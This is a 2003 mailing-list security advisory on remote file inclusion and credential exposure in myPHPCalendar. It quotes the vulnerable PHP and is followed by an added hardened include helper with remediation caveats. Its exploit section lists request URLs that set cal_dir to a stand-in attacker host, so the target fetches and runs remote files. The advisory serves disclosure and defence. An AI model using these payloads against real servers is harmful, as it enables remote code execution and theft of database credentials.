[VulnWatch] myPHPCalendar : Information Disclosure, File Include

From: Frog Man (leseulfrog_at_hotmail.com)
Date: 10/12/03

    To: vulnwatch@vulnwatch.org, bugtraq@securityfocus.com
    Date: Sun, 12 Oct 2003 13:18:44 +0200
    
    

    Information :
    ------------
    Language : PHP
    Version : 10192000 Build 1 Beta
    Website : http://myphpcalendar.sourceforge.net/
    Problems :
    - Information Disclosure
    - File Include

    PHP Code/Location :
    ------------------

    admin.php, contacts.php, convert-date.php :

    ------------------------
    include ("globals.inc");
    ------------------------

    globals.inc :

    ------------------------------
    include($cal_dir."vars.inc");
    include($cal_dir."prefs.inc");
    ------------------------------

    index.php :

    ----------------------------------------
    include ($cal_dir."globals.inc");
    [...]
    include($cal_dir."sql.inc");
    ----------------------------------------

    setup.php :

    ----------------------------------------------------------------
    $fp = fopen("setup.inc", "w+");
    fputs($fp, "<?php\n");
    fputs($fp, "\$url = \"".$URL."\";\n");
    fputs($fp, "\$mainscript = \"".$MAINSCRIPT."\";\n");
    fputs($fp, "\$mysql_server = \"".$MYSQL_SERVER."\";\n");
    fputs($fp, "\$mysql_username = \"".$MYSQL_USERNAME."\";\n");
    fputs($fp, "\$mysql_pass = \"".$MYSQL_PASS."\";\n");
    fputs($fp, "\$database_name = \"".$DATABASE_NAME."\";\n");
    fputs($fp, "\$db_type = \"".$DB_TYPE."\";\n");
    fputs($fp, "\$user_text = \"".$USER_TEXT."\";\n");
    fputs($fp, "\$crypt_type = \"".$CRYPT_TYPE."\";\n");
    fputs($fp, "\$display_username = \"".$DISPLAY_USERNAME."\";\n");
    fputs($fp, "\$maxdisplay = \"".$MAXDISPLAY."\";\n");
    fputs($fp, "\$admin_email = \"".$ADMIN_EMAIL."\";\n");
    ----------------------------------------------------------------

    Exploits :
    --------

    http://[target]/admin.php?cal_dir=http://[attacker]/
    http://[target]/contacts.php?cal_dir=http://[attacker]/
    http://[target]/convert-date.php?cal_dir=http://[attacker]/

    will include the files :

    http://[attacker]/vars.inc and/or http://[attacker]/prefs.inc

    and http://[target]/index.php?cal_dir=http://[attacker]/ will include the
    files :
    http://[target]/globals.inc http://[target]/sql.inc

    Patch :
    ------
    A patch and more details can be found on http://www.phpsecure.info.

    frog-m@n

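The include pattern quoted in the advisory, shown in a hardened form. This is an added example, not myPHPCalendar's own code and not the patch published on phpsecure.info. The root cause is that with register_globals=On a request parameter such as cal_dir=http://[attacker]/ defines $cal_dir before include($cal_dir."globals.inc") runs, and with allow_url_fopen=On PHP fetches and executes the remote file. The helper below (cal_include_path, the CAL_DIR constant and the allowlist are all names chosen here) never lets a request value pick the include directory, accepts only a fixed set of file names, and checks that the resolved path stays under the calendar directory:

```php
<?php
// Hardened replacement for the include($cal_dir."...") pattern.
// Added example: not myPHPCalendar's code, not the phpsecure.info patch.
//
// With register_globals=On, index.php?cal_dir=http://attacker/ sets $cal_dir
// before include($cal_dir."globals.inc") runs, so the remote file is fetched
// and executed. The fix is to stop honouring request input for the include
// directory altogether, rather than to sanitise $cal_dir.

// The directory this file lives in, computed from the script's own location.
// A constant cannot be overwritten by a request variable, unlike $cal_dir.
define('CAL_DIR', realpath(dirname(__FILE__)) . DIRECTORY_SEPARATOR);

// The only files this helper will ever resolve (names assumed for the example).
$cal_allowed_includes = array('globals.inc', 'vars.inc', 'prefs.inc', 'sql.inc');

/**
 * Return the validated absolute path of one of the calendar's own files.
 * Throws on any name that is not allowlisted or that resolves outside CAL_DIR.
 * The caller does the require itself at file scope (see usage below), so the
 * included file's variables keep their global scope, as in the original code.
 */
function cal_include_path($name)
{
    global $cal_allowed_includes;

    // 1. Exact-match allowlist: rejects "../", URL schemes and NUL bytes alike.
    if (!in_array($name, $cal_allowed_includes, true)) {
        throw new RuntimeException("refusing non-allowlisted include: $name");
    }

    // 2. Resolve the real path and confirm it is still under CAL_DIR.
    //    realpath() returns false for a missing file, which also blocks
    //    including a file that does not exist yet.
    $path = realpath(CAL_DIR . $name);
    if ($path === false || strpos($path, CAL_DIR) !== 0) {
        throw new RuntimeException("include target outside calendar dir: $name");
    }

    return $path;
}

// Usage in index.php / admin.php, replacing include($cal_dir."globals.inc"):
require cal_include_path('globals.inc');
require cal_include_path('sql.inc');
```

The allowlist alone closes the remote-include path; the realpath() check is a second line of defence in case the list is ever built from something less rigid. Two caveats a practitioner would still want: the helper does not make register_globals safe for the rest of the application, so that directive should be off regardless; and the setup.php code quoted above writes the MySQL credentials into setup.inc, a .inc file that a web server will serve as plain text unless .inc is mapped to the PHP handler or access to it is denied. The advisory does not state that this is the information disclosure it lists, so treat that as a configuration check to run rather than a confirmed finding.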

